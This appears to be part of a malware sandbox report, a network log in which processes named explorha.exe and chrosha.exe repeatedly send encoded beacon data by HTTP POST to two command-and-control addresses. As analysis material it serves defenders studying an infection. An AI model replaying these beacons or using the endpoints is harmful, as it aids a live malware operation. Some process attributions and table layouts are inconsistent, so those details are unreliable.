                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.748337030 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      424 | 192.168.2.5 | 50268 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.706698895 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.953375101 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      425 | 192.168.2.5 | 50269 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.102848053 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.348803043 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      426 | 192.168.2.5 | 50270 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.303739071 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.547142982 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      427 | 192.168.2.5 | 50271 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.593373060 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.840373039 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      428 | 192.168.2.5 | 50272 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.813230991 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.065231085 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      429 | 192.168.2.5 | 50273 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.195770979 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.440165997 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      430 | 192.168.2.5 | 50274 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.433562994 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.681734085 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      431 | 192.168.2.5 | 50275 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.690999031 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.939593077 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      432 | 192.168.2.5 | 50276 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.927830935 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:58.172730923 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 433 | Source IP: 192.168.2.5 | Source Port: 50277 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:31:58.312855959 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:58.562668085 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 434 | Source IP: 192.168.2.5 | Source Port: 50278 | Destination IP: 193.233.132.56 | Destination Port: 80
Timestamp: Apr 19, 2024 03:31:58.539184093 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:58.782886982 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 435 | Source IP: 192.168.2.5 | Source Port: 50279 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 412 | Process: C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp: Apr 19, 2024 03:31:58.815845966 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:31:59.070318937 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 436 | Source IP: 192.168.2.5 | Source Port: 50280 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:31:59.035808086 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:31:59.284615040 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 437 | Source IP: 192.168.2.5 | Source Port: 50281 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:31:59.432204962 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:59.676188946 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 438 | Source IP: 192.168.2.5 | Source Port: 50282 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:31:59.663532019 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:31:59.916558027 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 439 | Source IP: 192.168.2.5 | Source Port: 50283 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:31:59.926920891 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:00.176089048 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
440 | 192.168.2.5 | 50284 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:00.172422886 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
